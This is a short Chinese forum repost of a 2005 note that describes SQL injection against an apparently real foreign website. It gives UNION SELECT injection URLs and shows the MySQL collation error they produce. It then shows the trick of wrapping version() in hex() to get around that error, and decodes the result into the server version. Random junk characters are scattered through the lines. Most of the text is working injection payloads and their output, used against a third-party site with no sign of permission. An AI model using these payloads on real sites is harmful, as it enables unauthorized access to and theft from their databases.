本文作者:SuperHei4 D' T% b; Z% L( ]2 u* P, c
文章性质:原创. V* Q. _/ U3 W l4 k$ Z1 b$ N
发布日期:2005-10-18
% F0 H% u I1 f. y9 O测试个国外的站时:- Q4 Q. t# K, c/ f. E
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*6 D U$ P) U, b
返回错误:
0 i. D& h% i" H3 \* n! a4 c. w, mIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
, b# T, R5 j* Z' q1 bMySQL Error No. 126
9 D; q6 F) V3 D, P* C3 s" H看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。; C/ W$ t, d' ^6 o5 \4 N- W$ G E9 `
解决办法:转为其他编码如hex。7 x& v2 P9 K# c; k! O& e* S
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
, t2 w# M. w9 s7 L0 i2 j a成功得到hex(version())的值为:
2 t# f2 U5 H# z3 x" i1 ]6 L342E312E332D62657461
( y- D: g0 Y9 a7 } [3 K+ `- z回Mysql查询下得到:5 u* M7 V5 ]) Q R3 F, @8 @
mysql> select 0x342E312E332D62657461;, O% O9 o% s4 T
+------------------------+" V! e$ S; N& a( r0 Q) `3 k) o
| 0x342E312E332D62657461 |
, ~/ C, J! S% u+------------------------+
7 m6 m4 _) G+ g5 k% J, `/ y| 4.1.3-beta |
+ O8 s& U% F" j2 K+------------------------+9 N/ M/ V3 ?/ ]* O
1 row in set (0.00 sec)
! k2 ~2 T _/ v8 T
0 v, o+ h( _0 m |
发表于 2012-9-15 14:04:54
收藏
支持
反对